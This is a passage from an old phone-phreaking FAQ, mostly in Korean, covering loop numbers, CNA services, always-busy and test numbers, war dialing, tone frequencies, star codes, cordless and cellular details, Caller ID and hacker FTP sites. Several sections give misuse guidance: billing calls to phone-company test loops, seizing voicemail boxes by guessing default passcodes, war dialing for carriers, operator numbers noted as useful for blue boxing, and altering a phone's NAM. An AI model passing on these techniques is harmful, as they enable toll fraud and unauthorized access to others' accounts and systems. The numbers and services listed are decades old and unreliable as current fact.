908 953 New Brunswick, NJ

913 951-xxxx Lawrence/Salina/Topeka, KS

914 660-xxxx-xxxx Peekskill/Poughkeepsie/White Plains/Yonkers, NY

Canada:

204 590-xxx-xxxx Manitoba

416 57x-xxxx Toronto, Ontario

416 99x-xxxx Toronto, Ontario

416 999-xxx-xxxx Toronto, Ontario

506 572+xxx-xxxx New Brunswick

514 320-xxx-xxxx Montreal, Quebec

519 999-xxx-xxxx London, Ontario

N 604 311-xxx-xxxx British Columbia

613 999-xxx-xxxx Ottawa, Ontario

705 999-xxx-xxxx North Bay/Saulte Ste. Marie, Ontario

N 819 320-xxx-xxxx Quebec

N 905 999-xxx-xxxx Hamilton/Mississauga/Niagra Falls, Ontario

Australia: +61 199

Brazil: 109 or 199

N France: 3644

Holland: 99-xxxxxx

New Zealand: 137

Sweden: 0058

United Kingdom: 174 or 1744 or 175 or 0500-89-0011

N Amsterdam 0196

N Hilversum 0123456789

N Breukelen 0123456789

N Groningen 951


연결번호(loop)이란?

이 FAQ는 ToneLoc v0.99 사용자 매뉴얼에서 발췌한 것이다.

Loop(연결번호)란 전화번호의 쌍으로 대개는 바로 붙어 있는 번호이다. 예를 들어 836-9998과 836-9999와 같다. 이 번호는 전화회사에서 테스트를 하기 위해서 사용한다. 그렇다면 연결번호가 우리에게 좋은 이유는 무엇인가? 몇 가지 좋에서 좋다. 여기 간단한 연결번호 사용 방법이 있다.

각 연결번호는 두 개의 끝(end)이 있다. 'high' end와 'low' end이다. 한 쪽 끝은 전화가 걸려오면 대개 지속적이고, 시끄러운 음(tone)을 낸다. 다른 한 쪽은 조용하다. 연결번호는 대개 신호음이 울리지 않는다. 두 끝에 전화를 걸면, 연결번호를 통해 대화가 가능하다. 연결번호는 음성을 차단하여 지송적인 음을 제외한 아무 것도 통과 시키지 않는 것도 있다. 이런 것들은 우리에게 별로 소용이 없다. 여기에 연결번호를 어떻게 이용하는지 대한 것이 있다. 전화요금을 물리는 것!! 먼저, 시끄러운 움이 나는 한 쪽 끝에 전화를 건다. 교환원이나 다른 사람이 다른 쪽 끝에 전화를 걸면 음이 조용해진다. 금방 전화를 받은 것처럼 응답을 한다. "여보세요", "안녕", "챠오", "여" 등 아무거나. 그럼 교환원은 전화를 딴 곳으로 걸었다고 생각한다. 그러면 됐다. 이제 전화요금은 연결번호로 나간다. 지역 RBOC가 전화요금을 내게 된다. 이 방법은 신중하게 사용해야 한다. 그렇지 않으면, 연결번호가 없어질 것이다. 연결번호는 전화 번호를 가르쳐주고 싶지 않은 사람에게 전화할 수 있는 좋은 방법이다.

내가 있는 지역의 연결번호는?

번호중에서 많은 수가 더 이상 사용할 수 없는 것이다. 이 연결번호가 있는 곳에 산다면, 시도해 보고 메일로 결과를 알려주기 바란다.

CNA번호란 무엇인가?

CNA는 Customer Name and Address(고객 이름과 주소)를 나타낸다. CNA 번호는 전화회사 직원이 사용하는 번호로 전화를 걸어서 전화 번호에 대한 정보를 얻을 수 있는 것이다. 전화수리공이 알 수 없는 전화선을 발견하면, ANI 번호를 이용하여 전화 번호를 찾을 수 있고, CNA 교환원에 전화를 걸어, 누가 그 번호를 소유하고 그 사람이 어디에 살고 있는지 알 수 있다.

정상적일 경우 CNA 번호는 전화국 직원만이 알 수 있다. 사유 회사에서 CNA 정보를 얻을 수 있다. 아래의 두 회사가 그런 중류다.

이 번호는 900번 서비스로 분당 1달러 정도가 든다.

312나 708 국번 번호를 쓴다면, AmeriTech가 일반인을 위한 CNA 서비스를 하고 있다. 번호는 796-9000이다. 가격은 $.35/call 이다. 그리고 통화당 2개의 번호를 찾아 볼 수 있다.

415 번호 지역에 있다면, Pacific Bell에서 CNL 서비스를 (415)705-9299번으로 하고 있다.

Bell Atlantic 지역에서 전화를 이용하고 있다면 (201)555-5454번이나, (908)555-5454번으로 걸어서 CNA를 이용할 수 있다. 가격은 통화당 $.50이다.


내가 있는 지역의 전화회사 CNA번호는?

203 (203)771-8080 CT

312 (312)796-9600 Chicago, IL

506 (506)555-1313 New Brunswick

513 (513)397-9110 Cincinnati/Dayton, OH

516 (516)321-5700 Hempstead/Long Island, NY

614 (614)464-0123 Columbus/Steubenville, OH

813 (813)270-8711 Ft. Meyers/St. Petersburg/Tampa, FL

NYNEX (518)471-8111 New York, Connecticut, Vermont, Rhode

Island, New Hampshire, and Massachusetts


항상 통화중인 번호는 무엇인가?

다음 목록에서, "xxx"는 여러 프리픽스에서 계속적으로 통화중인 같은 번호를 의미한다. 이것들의 대부분에는 통화중 음을 내는 교환과 정상적인 교환이 있다. *ALWAYS* 한창 전화 통화가 많은 경우 항상 이러한 번호를 3 번 정도 테스트 한다.

N 800 999-1803 WATS

N 201 635-9970 Hackensack/Jersey City/Newark/Paterson, NJ

N 212 724-9970 Manhattan, NY

N 213 xxx-1117 Los Angeles, CA

N 213 xxx-1118 Los Angeles, CA

N 213 xxx-1119 Los Angeles, CA

N 213 xxx-9198 Los Angeles, CA

216 xxx-9887 Akron/Canton/Cleveland/Lorain/Youngstown, OH

303 431-0000 Denver, CO

303 866-8660 Denver, CO

N 310 xxx-1117 Long Beach, CA

N 310 xxx-1118 Long Beach, CA

N 310 xxx-1119 Long Beach, CA

N 310 xxx-9198 Long Beach, CA

316 952-7265 Dodge City/Wichita, KS

501 377-99xx AR

U 719 472-3772 Colorado Springs/Leadville/Pueblo, CO

805 255-0699 Bakersfield/Santa Barbara, CA

N 714 xxx-1117 Anaheim, CA

N 714 xxx-1118 Anaheim, CA

N 714 xxx-1119 Anaheim, CA

N 714 xxx-9198 Anaheim, CA

N 717 292-0009 Harrisburg/Scranton/Wilkes-Barre, PA

N 818 xxx-1117 Pasadena, CA

N 818 xxx-1118 Pasadena, CA

N 818 xxx-1119 Pasadena, CA

N 818 xxx-9198 Pasadena, CA

U 818 885-0699 Pasadena, CA (???-0699 is a pattern)

N 860 525-7078 Hartford, CT

906 632-9999 Marquette/Sault Ste. Marie, MI

906 635-9999 Marquette/Sault Ste. Marie, MI



전화 서비스를 잠시 중단하는 번호는 무엇인가?

NPA가 나타나 있지 않다면 LATA 를 포함하지 않고 있을 경우, 119(GTD5 스위치)나 511과 같은 흔한 번호를 시도해 보라.

314 511 Columbia/Jefferson City/St.Louis, MO (1 minute)

404 420 Atlanta, GA (5 minutes)

405 953 Enid/Oklahoma City, OK (1 minute)

U 407 511 Orlando, FL (United Telephone) (1 minute)

N 414 958-0013 Fond du Lac/Green Bay/Milwaukee/Racine, WI (1 minute)

512 200 Austin/Corpus Christi, TX (1 minute)

516 480 Hempstead/Long Island, NY (1 minute)

603 980 NH

614 xxx-9894 Columbus/Steubenville, OH

805 119 Bakersfield/Santa Barbara, CA (3 minutes)

919 211 or 511 Durham, NC (10 min - 1 hour)

감시 테스트 장치(Proctor Test Set)란?

감시 테스트 장치(Proctor Test Set)은 전화 선에 이상을 발견하기 위해서 전화회사 직원이 이용하는 도구이다. 감시 테스트 장치에 전화를 걸어서 원하는 테스트를 하기 위한 번호를 누르면 된다.


내가 있는 지역의 감시 테스트 장치는 무엇인가?

NPA가 나타나 있지 않다면, 111이나 117과 같은 흔한 번호를 시도해 보라.


스캐닝(scanning)이란?

스캐닝이란 흥미로운 반송파(컴퓨터)나 음을 찾기 위해서 엄청나게 많은 전화번호에 전화를 걸어보는 것이다.

스캐닝은 손으로 할 수 있지만, 손으로 하는 것은 지겹고 시간이 매우 오래 걸린다.

더 좋은 방법은 스캐닝 프로그램을 이용하는 것이다. 스캐닝 프로그램은 워 다이얼러(war dialer)이나 디먼 다이얼러(demon dialer)라고 부른다. 현재, 가장 좋은 워 다이얼러는 PC-DOS에서 사용할 수 있는 ToneLoc으로 Minor Threat와 Mucho Maas가 만든 것이다. ToneLoc은 ftp.paranoia.com/pub/toneloc/에서 ftp로 전송 받을 수 있다.

워 다이얼러는 많은 전화번호에 전화를 걸어서 각 번호에 대한 로그를 남긴다. 그리고 나서 반송파나 톤이 있었던 곳에 다시 전화를 해 볼 수 있다.

스캐닝은 불법인가?

2600에서 발췌, 1990년 봄, 27 페이지 :

- 인용시작 -

지역에 따라 스캐닝은 불법이다. 그렇지만, 스캐닝을 했다는 이유로 고소를 하는 것은 매우 힘들다 왜냐하면 스캐닝의 목적이 전화를 한 번호에 대해 단 한 번만 하는 것이기 때문이다. 스캐닝하는 컴퓨터에서 전화를 단 한 번 받은 것을 침해라고 생각하는 사람은 없을 것이다. 어떤 중앙 국에서는 사람들이 스캐닝을 시작하면 이상한 반응을 보인다고 알려져 있다. 때때로, 새키닝을 시작하고 몇 시간이 지나면 다이얼톤(dial tone)이 안 나게 된다고 한다. 그러나, 일정한 정책이 있은 것은 아니다. 먼저 그렇게 해서는 안 된다는 미친(crazy) 법을 찾는 것이 가장 좋을 것 같다. 만일 추측한대로 그런 법이 없다면, 한 번 해 보는 것이다.

- 인용 끝 -

콜로라도 주에서는 스캐닝을 불법으로 규정하는 법이 통과되었음에 유의하자. 통화를 하려는 목적이 아닌 전화는 콜로라도에서는 불법이다.


전화수리공의 장비를 어디서 살 수 있나?

Contact East

335 Willow Street

North Andover, MA 01845-5995

(508)682-2000

Jensen Tools

7815 S. 46th Street

Phoenix, AZ 85044-5399

(800)426-1194

Specialized Products

3131 Premier Drive

Irving, TX 75063

(800)866-5353

Time Motion Tools

12778 Brookprinter Place

Poway, CA 92064

(619)679-0303



DTMF 주파수란 무엇인가?

DTMF는 Dual Tone Multi Frequency의 약자이다. 이것은 전화의 숫자판에서 숫자를 누를 때 발생하는 음이다. 이 음은 행과 열의 합만큼이다. ABCD 키는 표준 전화기에는 없다.

1209 1336 1477 1633

697 1 2 3 A

770 4 5 6 B

852 7 8 9 C

941 * 0 # D



전화음의 주파수는 무엇인가?

Type Hz On Off

---------------------------------------------------------------------

Dial Tone 350 & 440 --- ---

Busy Signal 480 & 620 0.5 0.5

Toll Congestion 480 & 620 0.2 0.3

Ringback (Normal) 440 & 480 2.0 4.0

Ringback (PBX) 440 & 480 1.5 4.5

Reorder (Local) 480 & 620 3.0 2.0

Invalid Number 200 & 400

Hang Up Warning 1400 & 2060 0.1 0.1

Hang Up 2450 & 2600 --- ---



<* (LASS)코드는 모두 무엇인가?

Local Area Signal Service(LASS)와 Custom Calling Feature Control Code:

(이것들이 표준으로 생각되나, 지역적으로 차이가 있을 수 있다)

(These appear to be standard, but may be changed locally)

Service Tone Pulse/rotary Notes

--------------------------------------------------------------------------

Assistance/Police *12 n/a [1]

Cancel forwarding *30 n/a [C1]

Automatic Forwarding *31 n/a [C1]

Notify *32 n/a [C1] [2]

Intercom Ring 1 (..) *51 1151 [3]

Intercom Ring 2 (.._) *52 1152 [3]

Intercom Ring 3 (._.) *53 1153 [3]

Extension Hold *54 1154 [3]

Customer Originated Trace *57 1157

Selective Call Rejection *60 1160 (or Call Screen)

Selective Distinct Alert *61 1161

Selective Call Acceptance *62 1162

Selective Call Forwarding *63 1163

ICLID Activation *65 1165

Call Return (outgoing) *66 1166

Number Display Blocking *67 1167 [4]

Computer Access Restriction *68 1168

Call Return (incoming) *69 1169

Call Waiting disable *70 1170 [4]

No Answer Call Transfer *71 1171

Usage Sensitive 3 way call *71 1171

Call Forwarding: start *72 or 72# 1172

Call Forwarding: cancel *73 or 73# 1173

Speed Calling (8 numbers) *74 or 74# 1174

Speed Calling (30 numbers) *75 or 75# 1175

Anonymous Call Rejection *77 1177 [5] [M: *58]

Call Screen Disable *80 1180 (or Call Screen) [M: *50]

Selective Distinct Disable *81 1181 [M: *51]

Select. Acceptance Disable *82 1182 [4] [7]

Select. Forwarding Disable *83 1183 [M: *53]

ICLID Disable *85 1185

Call Return (cancel out) *86 1186 [6] [M: *56]

Anon. Call Reject (cancel) *87 1187 [5] [M: *68]

Call Return (cancel in) *89 1189 [6] [M: *59]

Notes:

[C1] - Means code used for Cellular One service

[1] - for cellular in Pittsburgh, PA A/C 412 in some areas

[2] - indicates that you are not local and maybe how to reach you

[3] - found in Pac Bell territory; Intercom ring causes a distinctive

ring to be generated on the current line; Hold keeps a call

connected until another extension is picked up

[4] - applied once before each call

[5] - A.C.R. blocks calls from those who blocked Caller ID

(used in C&P territory, for instance)

[6] - cancels further return attempts

[7] - *82 (1182) has been mandated to be the nationwide code for

"Send CLID info regardless of the default setting on this

phone line."

[M: *xx] - alternate code used for MLVP (multi-line variety package)

by Bellcore. It goes by different names in different RBOCs.

In Bellsouth it is called Prestige. It is an arrangement of

ESSEX like features for single or small multiple line groups.

The reason for different codes for some features in MLVP is that

call-pickup is *8 in MLVP so all *8x codes are reassigned *5x



무선 전화가 작동하는 주파수는 무엇인가?

1 세대 46/49Mhz 전화의 주파수가 아래에 있다.

Channel Handset Transmit Base Transmit

------- ---------------- -------------

1 49.670mhz 46.610mhz

2 49.845 46.630

3 49.860 46.670

4 49.770 46.710

5 49.875 46.730

6 49.830 46.770

7 49.890 46.830

8 49.930 46.870

9 49.990 46.930

10 49.970 46.970

"900Mhz"의 신세대 무선전화기는 902-228Mhz 사이의 주파수가 할당된다. 30-100Khz의 채널당 여유가 있다.

----------------------------------------------------------------

Panasonic KX-T9000 (60 Channels)

base 902.100 - 903.870 Base frequencies (30Khz spacing)

handset 926.100 - 927.870 Handset frequencies

CH BASE HANDSET CH BASE HANDSET CH BASE HANDSET

-- ------- ------- -- ------- ------- -- ------- -------

01 902.100 926.100 11 902.400 926.400 21 902.700 926.700

02 902.130 926.130 12 902.430 926.430 22 902.730 926.730

03 902.160 926.160 13 902.460 926.460 23 902.760 926.760

04 902.190 926.190 14 902.490 926.490 24 902.790 926.790

05 902.220 926.220 15 902.520 926.520 25 902.820 926.820

06 902.250 926.250 16 902.550 926.550 26 902.850 926.850

07 902.280 926.280 17 902.580 926.580 27 902.880 926.880

08 902.310 926.310 18 902.610 926.610 28 902.910 926.910

09 902.340 926.340 19 902.640 926.640 29 902.940 926.940

10 902.370 926.370 20 902.670 926.670 30 902.970 926.970

31 903.000 927.000 41 903.300 927.300 51 903.600 927.600

32 903.030 927.030 42 903.330 927.330 52 903.630 927.630

33 903.060 927.060 43 903.360 927.360 53 903.660 927.660

34 903.090 927.090 44 903.390 927.390 54 903.690 927.690

35 903.120 927.120 45 903.420 927.420 55 903.720 927.720

36 903.150 927.150 46 903.450 927.450 56 903.750 927.750

37 903.180 927.180 47 903.480 927.480 57 903.780 927.780

38 903.210 927.210 48 903.510 927.510 58 903.810 927.810

39 903.240 927.240 49 903.540 927.540 59 903.840 927.840

40 903.270 927.270 50 903.570 927.570 60 903.870 927.870

------------------------------------------------------------

V-TECH TROPEZ DX900 (20 CHANNELS)

905.6 - 907.5 TRANSPONDER (BASE) FREQUENCIES (100 KHZ SPACING)

925.5 - 927.4 HANDSET FREQUENCIES

CH BASE HANDSET CH BASE HANDSET CH BASE HANDSET

-- ------- ------- -- ------- ------- -- ------- -------

01 905.600 925.500 08 906.300 926.200 15 907.000 926.900

02 905.700 925.600 09 906.400 926.300 16 907.100 927.000

03 905.800 925.700 10 906.500 926.400 17 907.200 927.100

04 905.900 925.800 11 906.600 926.500 18 907.300 927.200

05 906.000 925.900 12 906.700 926.600 19 907.400 927.300

06 906.100 926.000 13 906.800 926.700 20 907.500 927.400

07 906.200 926.100 14 906.900 926.800

------------------------------------------------------------

Other 900mhz cordless phones

AT&T #9120 - - - - - 902.0 - 905.0 & 925.0 - 928.0 MHZ

OTRON CORP. #CP-1000 902.1 - 903.9 & 926.1 - 927.9 MHZ

SAMSUNG #SP-R912- - - 903.0 & 927.0 MHZ

------------------------------------------------------------


발신자 식별자(caller-ID)는 무엇인가?

This FAQ answer is stolen from Rockwell:

Calling Number Delivery (CND), better known as Caller ID, is a

telephone service intended for residential and small business

customers. It allows the called Customer Premises Equipment (CPE) to

receive a calling party's directory number and the date and time of

the call during the first 4 second silent interval in the ringing

cycle.

Parameters

~~~~~~~~~~

The data signalling interface has the following characteristics:

Link Type: 2-wire, simplex

Transmission Scheme: Analog, phase-coherent FSK

Logical 1 (mark) 1200 +/- 12 Hz

Logical 0 (space) 2200 +/- 22 Hz

Transmission Rate: 1200 bps

Transmission Level: 13.5 +/- dBm into 900 ohm load

Protocol

~~~~~~~~

The protocol uses 8-bit data words (bytes), each bounded by a start

bit and a stop bit. The CND message uses the Single Data Message

format shown below.

| Channel | Carrier | Message | Message | Data | Checksum |

| Seizure | Signal | Type | Length | Word(s) | Word |

| Signal | | Word | Word | | |

Channel Seizure Signal

~~~~~~~~~~~~~~~~~~~~~~

The channel seizure is 30 continuous bytes of 55h (01010101) providing

a detectable alternating function to the CPE (i.e. the modem data

pump).

Carrier Signal

~~~~~~~~~~~~~~

The carrier signal consists of 130 +/- 25 mS of mark (1200 Hz) to

condition the receiver for data.

Message Type Word

~~~~~~~~~~~~~~~~~

The message type word indicates the service and capability associated

with the data message. The message type word for CND is 04h

(00000100).

Message Length Word

~~~~~~~~~~~~~~~~~~~

The message length word specifies the total number of data words to

follow.

Data Words

~~~~~~~~~~

The data words are encoded in ASCII and represent the following

information:

o The first two words represent the month

o The next two words represent the day of the month

o The next two words represent the hour in local military time

o The next two words represent the minute after the hour

o The calling party's directory number is represented by the

remaining words in the data word field

If the calling party's directory number is not available to the

terminating central office, the data word field contains an ASCII "O".

If the calling party invokes the privacy capability, the data word

field contains an ASCII "P".

Checksum Word

~~~~~~~~~~~~~

The Checksum Word contains the twos complement of the modulo 256 sum

of the other words in the data message (i.e., message type, message

length, and data words). The receiving equipment may calculate the

modulo 256 sum of the received words and add this sum to the received

checksum word. A result of zero generally indicates that the message

was correctly received. Message retransmission is not supported.

Example CNS Single Data Message

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

An example of a received CND message, beginning with the message type

word, follows:

04 12 30 39 33 30 31 32 32 34 36 30 39 35 35 35 31 32 31 32 51

04h= Calling number delivery information code (message type word)

12h= 18 decimal; Number of data words (date,time, and directory

number words)

ASCII 30,39= 09; September

ASCII 33,30= 30; 30th day

ASCII 31,32= 12; 12:00 PM

ASCII 32,34= 24; 24 minutes (i.e., 12:24 PM)

ASCII 36,30,39,35,35,35,31,32,31,32= (609) 555-1212; calling

party's directory number

51h= Checksum Word

Data Access Arrangement (DAA) Requirements

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To receive CND information, the modem monitors the phone line between

the first and second ring bursts without causing the DAA to go off

hook in the conventional sense, which would inhibit the transmission

of CND by the local central office. A simple modification to an

existing DAA circuit easily accomplishes the task.

Modem Requirements

~~~~~~~~~~~~~~~~~~

Although the data signalling interface parameters match those of a

Bell 202 modem, the receiving CPE need not be a Bell 202 modem. A

V.23 1200 bps modem receiver may be used to demodulate the Bell 202

signal. The ring indicate bit (RI) may be used on a modem to indicate

when to monitor the phone line for CND information. After the RI bit

sets, indicating the first ring burst, the host waits for the RI bit

to reset. The host then configures the modem to monitor the phone

line for CND information.

Signalling

~~~~~~~~~~

According to Bellcore specifications, CND signalling starts as early

as 300 mS after the first ring burst and ends at least 475 mS before

the second ring burst

Applications

~~~~~~~~~~~~

Once CND information is received the user may process the information

in a number of ways.

1. The date, time, and calling party's directory number can be

displayed.

2. Using a look-up table, the calling party's directory number can be

correlated with his or her name and the name displayed.

3. CND information can also be used in additional ways such as for:

a. Bulletin board applications

b. Black-listing applications

c. Keeping logs of system user calls, or

d. Implementing a telemarketing data base

References

~~~~~~~~~~

For more information on Calling Number Delivery (CND), refer to

Bellcore publications TR-TSY-000030 and TR-TSY-000031.

To obtain Bellcore documents contact:

Bellcore Customer Service

60 New England Avenue, Room 1B252

Piscataway, NJ 08834-4196

(908) 699-5800


발신자 식별자는 어떻게 막을 수 있나?

Always test as much as possible before relying on any method of blocking

Caller-ID. Some of these methods work in some areas, but not in others.

Dial *67 before you dial the number. (141 in the United Kingdom)

Dial your local TelCo and have them add Caller-ID block to your line.

Dial the 0 Operator and have him or her place the call for you.

Dial the call using a pre-paid phone card.

Dial through Security Consultants at (900)PREVENT for U.S. calls

($1.99/minute) or (900)STONEWALL for international calls ($3.99/minute).

Dial from a pay phone. :-)

PBX 란 무엇인가?

PBX는 Private Branch Exchange(구내 교환기)의 약어이다. PBX는 소형 전화 교환기로 회사가 기관이 소유한다. 천명의 피고용인이 있는 회사를 가정하자. PBX가 없을 경우, 1000개의 전화선이 필요하다. 그렇지만, 10%정도의 사람만이 동시에 전화를 사용한다고 하자. 피고용인이 전화를 할려고 할 때, 이용가능한 외선을 찾아서 연결하는 컴퓨터가 있다면 어떨까? 이런 종류의 시스템이 있다면 전화선 비용의 10분의 1만 부담하면 된다.

VMB란 무엇인가?

VMB는 Voicie Mail Box(음성 메일 박스)의 약자이다. VMB는 수십만의 사용자에 서비스를 하는 자동 응답기이다. 각 사용자는 자신의 음성 메일 박스를 이 시스템 내에 가지게 된다. 각 메일 박스는 박스 번호와 암호(passcode)를 가지게 된다.

암호가 없이 VMB 시스템에 음성 메시지를 남길 수 있다. 암호가 있으면, 메일박스를 정리하고 메시지를 읽을 수 있다. 때때로, 디폴트로 생성된 메일박스나 더 이상 사용되지 않는 메일박스가 있을 수 있다. 이러한 메일박스를 암호를 추측하여 탈취할 수 있다. 대개 암호는 1234와 같이 흔한 것이다.

ABCD 음은 무엇을 위한 것인가?

ABCD 음(tone)은 DTFM 음에 추가한 것이다. ABCD 음은 미국 군사 전화 망(AutoVon)에서 이용되고, Automatic Call Distributor(ACD)에서 이용되고, PBX의 제어 메시지로, 아마추어 무선의 자동패치(auto-patch)에서 사용된다.

The ABCD tones are simply additional DTFM tones that may be used in any

way the standard (0-9) tones are used. The ABCD tones are used in the

U.S. military telephone network (AutoVon), in some Automatic Call

Distributor (ACD) systems, for control messages in some PBX systems, and

in some amateur radio auto-patches.

In the AutoVon network, special telephones are equipped with ABCD keys.

The ABCD keys are defined as such:

A - Flash

B - Flash override priority

C - Priority communication

D - Priority override

Using a built-in maintenance mode of the Automatic Call Distributor

(ACD) systems once used by Directory Assistance operators, you could

connect two callers together.

The purpose of the Silver Box is to create the ABCD tones.

See also "What are the DTMF Frequencies?"


국제 직접 번호(International Direct Number)란 무엇인가?

The numbers are used so that you may connect to an operator from a

foreign telephone network, without incurring long distance charges.

These numbers may be useful in blue boxing, as many countries still have

older switching equipment in use.

Australia (800)682-2878

Austria (800)624-0043

Belgium (800)472-0032

Belize (800)235-1154

Bermuda (800)232-2067

Brazil (800)344-1055

British VI (800)278-6585

Cayman (800)852-3653

Chile (800)552-0056

China (Shanghai) (800)532-4462

Costa Rica (800)252-5114

Denmark (800)762-0045

El Salvador (800)422-2425

Finland (800)232-0358

France (800)537-2623

Germany (800)292-0049

Greece (800)443-5527

Guam (800)367-4826

HK (800)992-2323

Hungary (800)352-9469

Indonesia (800)242-4757

Ireland (800)562-6262

Italy (800)543-7662

Japan (800)543-0051

Korea (800)822-8256

Macau (800)622-2821

Malaysia (800)772-7369

Netherlands (800)432-0031

Norway (800)292-0047

New Zealand (800)248-0064

Panama (800)872-6106

Portugal (800)822-2776

Philippines (800)336-7445

Singapore (800)822-6588

Spain (800)247-7246

Sweden (800)345-0046

Taiwan (800)626-0979

Thailand (800)342-0066

Turkey (800)828-2646

UK (800)445-5667

Uruguay (800)245-8411

Yugoslavia (800)367-9842 (Belgrade)

367-9841 (Zagreb)

USA from outside (800)874-4000 Ext. 107



무선 전화

MTSO란 무엇인가?

MTSO란 Mobile Telephone Switching Office(이동 전화 교환국)를 말한다. MTSO는 개개의 셀

탑(cell tower)를 CO(Central Office; 중앙 교환국)으로 연결한다.

MTSO는 이동 전화의 상대적인 신호 크기를 관찰하여 감도가 제일 좋은 셀타워에서 신호를 받도록 한다.


NAM이란 무엇인가?

NAM은 Number Assignment Module(번호지정 모듈)의 약어이다. NAM은 EPROM이고 MIN이이나 SIDH와 같은 정보를 담고 있다. 이곳에 저장된 정보를 변경하여 무선 전화를 오용할 수 있다.


ESN이란 무엇인가?

ESN은 Electronic Serial Number(전자 시리얼 번호)의 약어이다. 이것은 무선전화의 시리얼 번호을 말한다.


MIN은 무엇인가?

MIN은 Mobile Identification Number(이동 식별 번호)를 말한다. 이것은 이동 전화의 전화번호이다.


SCM이란 무엇인가?

SCM은 Station Class Mark(국 등급 표시)의 약어이다. SCM은 3가지의 다른 정보를 포함하는 4비트의 숫자이다. 이동 전화는 셀 타워에 이 정보(와 다른 정보)를 보낸다. 비트 1은 구식 666채널을 사용하는 이동전화인지 아니면 신식 832 채널을 이용하는 이동 전화인지를 셀 타워에 알려준다. 832 채널로 확장은 1988년에 이루어졌다. 비트 2는 이동전화가 이동용 기기(mobild unit)인지 아니면 음성 구동형(voice activated cellular telephone) 이동전화 인지를 구분한다. 비트 3과 4는 셀 타워에 이동 전화가 송신하는 출력을 알려준다.


SIDH란 무엇인가?

SIDH란 System Identification for Home System(가정용 시스템용 시스템 식별)의 약어이다. 이

동 전화에 있는 SIDH는 이동전화 시스템에 어느 지역에서 이동전화를 이용하고 있는지 알려 준다. 이것은 로밍시(가입자의 이동전화를 제공하는 회사가 서비스 할 수 없는 다른 회사가 서비스 할 수 있는 영역에 있을 때)에 이용된다.

어떤 지역에서든 두 개의 SIDH 가 있다. 하나는 유선 반송파(carrier)를 위한 것이고, 다른 하나은 무선 반송파를 위한 것이다. 같은 지역에서 합법적으로 인정된 무선전화 서비스를 제공할 수 있는 두 회사가 있을 수 있다. 유선 반송파는 지역 전화 회사이고, 무선 반송파는 다른 회사가 된다. 유선 SIDH 반송파는 항상 짝수이고 이에 반해 무선 SIDH 반송파는 홀수이다. 유성 반송파는 Side-B 반송파라고 알려져 있다. 그리고 무선 반송파는 Side-A 반송파라고 알려져 있다.



진행/반전(forward/reverse) 채널이란?

포워드 채널이란 셀 타워가 이동전화에게 보내는 주파수이다. 리버스(reverse) 채널이란 이동 전화가 셀 타워에게 보내는 주파수이다.

포워드 채널은 대개 리버스 채널에 비해 45Mhz 높다. 예를 들어 리버스 채널이 824Mhz라면 포워드 채널은 869Mhz가 된다.


자원

해커에게 관심가는 ftp 사이트는 무엇인가?

N 204.215.84.2 /pub/dmackey

2600.com (2600 Magazine)

aeneas.mit.edu (Kerberos)

alex.sp.cs.cmu.edu /links/security (Misc)

asylum.sf.ca.us (CyberWarriors of Xanadu)

N atari.archive.umich.edu /pub/atari/Utilities/pgp261st.zip (Atari PGP)

athena-dist.mit.edu /pub/ATHENA (Athena Project)

atlantis.utmb.edu (Anti-virus)

bellcore.com (Bellcore)

cert.org (CERT)

ciac.llnl.gov (CIAC)

clark.net /pub/jcase (H/P)

cnit.nsk.su /pub/security (Security)

coast.cs.purdue.edu /pub (Security/COAST)

coombs.anu.edu.au /pub/security (Security)

csrc.ncsl.nist.gov (NIST Security)

dartmouth.edu /pub/security (Security)

ds.internic.net (Internet documents)

N dutiws.twi.tudelft.nl /pub/novell

etext.archive.umich.edu /pub/Zines/PrivateLine (PrivateLine)

N fastlane.net /pub/nomad

ftp.3com.com /pub/Orange-Book (Orange Book)

ftp.acns.nwu.edu /pub (Mac Anti-virus)

ftp.acsu.buffalo.edu /pub/security & /pub/irc (Security & IRC)

ftp.alantec.com /pub/tcpr (Tcpr)

ftp.armory.com /pub/user/kmartind (H/P)

ftp.armory.com /pub/user/swallow (H/P)

ftp.auscert.org.au /pub (Australian CERT)

ftp.cerf.net /pub/software/unix/security (CERFnet)

ftp.cert.dfn.de (FIRST)

ftp.cisco.com (Cisco)

ftp.commerce.net /pub/standards/drafts/shttp.txt (Secure HyperText)

ftp.cs.colorado.edu

ftp.cs.ruu.nl /pub/SECURITY (Security & PGP)

ftp.cs.uwm.edu /pub/comp-privacy (Privacy Digest)

ftp.cs.vu.nl

ftp.cs.yale.edu

ftp.csi.forth.gr /pub/security

ftp.csl.sri.com /pub/nides (SRI)

ftp.csn.org /mpj (Cryptology)

ftp.csua.berkeley.edu /pub/cypherpunks (Crypto)

ftp.delmarva.com

N ftp.demon.co.uk /pub/misc/0800num.txt (0800/0500 numbers)

ftp.denet.dk /pub/security/tools/satan

ftp.digex.net /pub/access/dunk

ftp.dsi.unimi.it /pub/security/crypt (Crypto)

ftp.dstc.edu.au /pub/security/satan

ftp.ee.lbl.gov

ftp.eff.org /pub/Publications/CuD (EFF)

ftp.elelab.nsc.co.jp /pub/security (Security)

ftp.etext.org (Etext)

ftp.fc.net /pub/deadkat (TNO)

ftp.fc.net /pub/defcon (DefCon)

ftp.fc.net /pub/defcon/BBEEP (BlueBeep)

ftp.fc.net /pub/phrack (Phrack)

ftp.foobar.com

ftp.funet.fi /pub/doc/CuD

ftp.gate.net /pub/users/laura

ftp.gate.net /pub/users/wakko

ftp.giga.or.at /pub/hacker/ (H/P)

ftp.greatcircle.com /pub/firewalls (Firewalls)

ftp.IEunet.ie /pub/security (Security)

ftp.ifi.uio.no

ftp.indirect.com /www/evildawg/public_access/C&N/

ftp.info.fundp.ac.be

ftp.informatik.uni-hamburg.de

ftp.informatik.uni-kiel.de /pub/sources/security

ftp.inoc.dl.nec.com /pub/security (Security)

ftp.isi.edu

ftp.lava.net /users/oracle/ (H/P

N ftp.leo.org/pub/com/os/os2/crypt

ftp.lerc.nasa.gov /security

ftp.llnl.gov /pub (CIAC)

ftp.luth.se /pub/unix/security

ftp.lysator.liu.se

ftp.mcs.anl.gov /pub/security

ftp.microserve.net /ppp-pop/strata/mac (Mac)

ftp.near.net /security/archives/phrack (Zines)

ftp.nec.com

ftp.net.ohio-state.edu /pub/security/satan

ftp.netcom.com /pub/br/bradleym (Virii)

ftp.netcom.com /pub/da/daemon9 (H/P)

ftp.netcom.com /pub/fi/filbert

N ftp.netcom.com /pub/gr/grady

N ftp.netcom.com /pub/il/illusion (H/P+Virus)

N ftp.netcom.com /pub/je/jericho (H/P)

ftp.netcom.com /pub/le/lewiz (Social Engineering)

